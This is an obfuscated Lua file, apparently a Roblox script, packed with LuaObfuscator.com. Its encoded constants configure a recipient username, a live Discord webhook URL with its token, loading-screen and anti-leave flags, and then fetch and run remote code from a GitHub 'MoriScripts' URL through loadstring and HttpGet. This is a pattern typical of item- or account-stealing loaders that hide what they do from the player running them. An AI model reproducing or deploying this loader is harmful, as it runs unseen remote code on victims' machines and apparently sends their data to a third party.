--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v80,v19);v19=nil;v91=1;end end else return v80;end end end);local function v20(v31,v32,v33)if v33 then local v81=(v31/(((2 + 3) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v81-(v81%(620 -(555 + 64))) ;else local v82=(933 -(857 + 74))^(v32-(569 -(367 + 32 + 169))) ;return (((v31%(v82 + v82))>=v82) and 1) or ((1804 -(282 + 595)) -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1065 -(68 + 997))) then v38,v39,v40,v41=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + (17 -13) ;v37=958 -(892 + 65) ;end if (v37==(118 -(32 + (202 -117)))) then return (v41 * ((30391645 -13949830) + 335401)) + (v40 * 65536) + (v39 * (57 + 199)) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,(369 -(10 + 8)) -(87 + (1011 -748)) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v42 ;local v46=v20(v43,16 + 5 ,123 -(163 -71) );local v47=((v20(v43,984 -(802 + 150) )==(2 -1)) and  -(1 -0)) or 1 ;if (v46==(0 + 0)) then if (v45==(997 -(908 + 7 + (873 -(368 + 423))))) then return v47 * (0 -0) ;else local v93=0 -0 ;while true do if (v93==(0 + (442 -(416 + 26)))) then v46=1 -0 ;v44=0;break;end end end elseif (v46==(3234 -(1069 + 118))) then return ((v45==0) and (v47 * (((6 -4) -1)/(0 -(0 + 0))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((1 + 1)^52))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v64=431 -(44 + 386) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(1 + 1)) then local v86=0 + 0 ;while true do if ((0 + 0)~=v86) then else for v98=2 -1 ,v23() do local v99=0 -0 ;local v100;local v101;local v102;local v103;while true do if (v99~=(116 -(4 + 110))) then else while true do if (v100~=(584 -(57 + 527))) then else local v158=0 -0 ;while true do if (v158==(1427 -(41 + 1386))) then v101=0;v102=nil;v158=104 -(17 + 86) ;end if (v158==(2 -1)) then v100=1;break;end end end if (v100~=1) then else v103=nil;while true do if (v101~=0) then else local v164=0 + 0 ;while true do if (v164~=(0 -0)) then else v102=0 + 0 ;v103=nil;v164=2 -1 ;end if ((1 + 0)==v164) then v101=1 -0 ;break;end end end if ((397 -(115 + 281))~=v101) then else while true do if (v102~=(0 + 0)) then else v103=v21();if (v20(v103,1 + 0 ,1 -0 )~=0) then else local v167=0 -0 ;local v168;local v169;local v170;local v171;local v172;while true do if ((1 + 0)~=v167) then else v170=nil;v171=nil;v167=4 -2 ;end if (v167~=(7 -5)) then else v172=nil;while true do if (v168~=0) then else local v174=0 + 0 ;while true do if ((1258 -(1043 + 214))==v174) then v168=868 -(550 + 317) ;break;end if ((0 -0)~=v174) then else v169=1212 -(323 + 889) ;v170=nil;v174=1 -0 ;end end end if (1~=v168) then else local v175=0;while true do if (v175==(0 -0)) then v171=nil;v172=nil;v175=1;end if (v175==1) then v168=5 -3 ;break;end end end if (v168~=(287 -(134 + 151))) then else while true do if (v169==(1665 -(970 + 695))) then local v176=0;while true do if (v176==(321 -(53 + 267))) then v169=1 -0 ;break;end if (v176~=(1990 -(582 + 1408))) then else v170=v20(v103,6 -4 ,3);v171=v20(v103,4 -0 ,6);v176=1;end end end if (v169==(7 -5)) then local v177=1824 -(1195 + 629) ;local v178;while true do if (v177==0) then v178=0;while true do if (0==v178) then if (v20(v171,1 -0 ,242 -(187 + 54) )==1) then v172[782 -(162 + 618) ]=v57[v172[2 + 0 ]];end if (v20(v171,2 + 0 ,2 + 0 )==1) then v172[3]=v57[v172[6 -3 ]];end v178=1;end if (v178==(1 -0)) then v169=3;break;end end break;end end end if (v169~=(1 + 0)) then else local v179=0;local v180;while true do if (v179==(850 -(20 + 830))) then v180=0 + 0 ;while true do if (v180==1) then v169=1638 -(1373 + 263) ;break;end if (v180~=(1000 -(451 + 549))) then else v172={v22(),v22(),nil,nil};if (v170==(0 -0)) then local v188=0;while true do if ((1384 -(746 + 638))~=v188) then else v172[2 + 1 ]=v22();v172[3 + 1 ]=v22();break;end end elseif (v170==(1 + 0)) then v172[7 -4 ]=v23();elseif (v170==2) then v172[4 -1 ]=v23() -(2^16) ;elseif (v170==(7 -4)) then local v193=0;local v194;while true do if (v193==(341 -(218 + 123))) then v194=1581 -(1535 + 46) ;while true do if (v194==(0 + 0)) then v172[3]=v23() -(2^16) ;v172[1 + 3 ]=v22();break;end end break;end end end v180=406 -(118 + 287) ;end end break;end end end if (v169~=(11 -8)) then else if (v20(v171,1124 -(118 + 1003) ,563 -(306 + 254) )==1) then v172[1 + 3 ]=v57[v172[7 -3 ]];end v52[v98]=v172;break;end end break;end end break;end if (v167==(377 -(142 + 235))) then v168=1467 -(899 + 568) ;v169=nil;v167=1 + 0 ;end end end break;end end break;end end break;end end break;end if (v99~=(2 -1)) then else v102=nil;v103=nil;v99=605 -(268 + 335) ;end if ((290 -(60 + 230))==v99) then v100=572 -(426 + 146) ;v101=nil;v99=1 + 0 ;end end end for v104=1457 -(282 + 1174) ,v23() do v53[v104-(1 + 0) ]=v28();end v86=1;end if (v86~=(812 -(569 + 242))) then else return v55;end end end if (v51==(0 + 0)) then local v87=0 -0 ;local v88;while true do if (v87~=(0 + 0)) then else v88=0 + 0 ;while true do if ((2 -1)~=v88) then else local v117=0 + 0 ;while true do if (v117==(0 -0)) then v54={};v55={v52,v53,nil,v54};v117=1;end if (v117~=(2 -1)) then else v88=1 + 1 ;break;end end end if (v88==(0 + 0)) then v52={};v53={};v88=1 + 0 ;end if ((1 + 1)==v88) then v51=701 -(271 + 429) ;break;end end break;end end end if (v51~=1) then else local v89=0 + 0 ;local v90;while true do if (v89~=(1500 -(1408 + 92))) then else v90=731 -(476 + 255) ;while true do if (v90~=1) then else local v118=1086 -(461 + 625) ;while true do if (v118==(1289 -(993 + 295))) then v90=2;break;end if (v118==0) then for v159=1,v56 do local v160=0;local v161;local v162;local v163;while true do if (v160~=(0 + 0)) then else v161=0 -0 ;v162=nil;v160=1;end if (1~=v160) then else v163=nil;while true do if (v161~=0) then else local v165=1171 -(418 + 753) ;while true do if ((1 -0)~=v165) then else v161=1 + 0 ;break;end if (v165~=0) then else local v173=0 + 0 ;while true do if ((1 + 0)~=v173) then else v165=337 -(144 + 192) ;break;end if (v173==0) then v162=v21();v163=nil;v173=1 + 0 ;end end end end end if (v161~=1) then else if (v162==(530 -(406 + 123))) then v163=v21()~=(0 + 0) ;elseif (v162==(1771 -(1749 + 20))) then v163=v24();elseif (v162~=(1 + 2)) then else v163=v25();end v57[v159]=v163;break;end end break;end end end v55[1325 -(1249 + 73) ]=v21();v118=1505 -(363 + 1141) ;end end end if (v90~=0) then else local v119=0 + 0 ;while true do if (v119~=(1146 -(466 + 679))) then else v90=1;break;end if (v119~=(1580 -(1183 + 397))) then else v56=v23();v57={};v119=2 -1 ;end end end if (v90==(5 -3)) then v51=1902 -(106 + 1794) ;break;end end break;end end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v83=0,v74 do if (v83>=v68) then v72[v83-v68 ]=v73[v83 + 1 ];else v76[v83]=v73[v83 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=5) then if (v79<=2) then if (v79<=0) then v76[v78[2]]=v78[3]~=0 ;elseif (v79==1) then local v120=v78[2];local v121=v76[v78[3]];v76[v120 + 1 ]=v121;v76[v120]=v121[v78[4]];else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=3) then v76[v78[2]]=v60[v78[3]];elseif (v79==4) then v76[v78[2]]();else v76[v78[2]]=v78[3];end elseif (v79<=8) then if (v79<=6) then v60[v78[3]]=v76[v78[2]];elseif (v79>7) then local v129=v78[2];local v130,v131=v69(v76[v129](v13(v76,v129 + 1 ,v78[3])));v71=(v131 + v129) -1 ;local v132=0;for v151=v129,v71 do v132=v132 + 1 ;v76[v151]=v130[v132];end else do return;end end elseif (v79<=9) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v60[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v60[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]][v78[3]]=v78[4];elseif (v79==10) then local v133;local v134,v135;local v136;local v137;v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v60[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v60[v78[3]];v70=v70 + 1 ;v78=v66[v70];v137=v78[2];v136=v76[v78[3]];v76[v137 + 1 ]=v136;v76[v137]=v136[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3]~=0 ;v70=v70 + 1 ;v78=v66[v70];v137=v78[2];v134,v135=v69(v76[v137](v13(v76,v137 + 1 ,v78[3])));v71=(v135 + v137) -1 ;v133=0;for v154=v137,v71 do v133=v133 + 1 ;v76[v154]=v134[v133];end v70=v70 + 1 ;v78=v66[v70];v137=v78[2];v76[v137]=v76[v137](v13(v76,v137 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];do return;end else local v149=v78[2];v76[v149]=v76[v149](v13(v76,v149 + 1 ,v71));end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0F3O0003083O00557365724E616D65030A3O004C65616E596F6775727403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323738392O3834303135393233363130372F364D7867323947505247706443763675394A5A57335847714C7A4E44736D446434484C38442O647949544E616E6A44635653732D414736424E3935424E50716B466C514403093O00557365724E616D6532030F3O004C65616E596F67757274204865726503023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012033O00073O00300A3O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
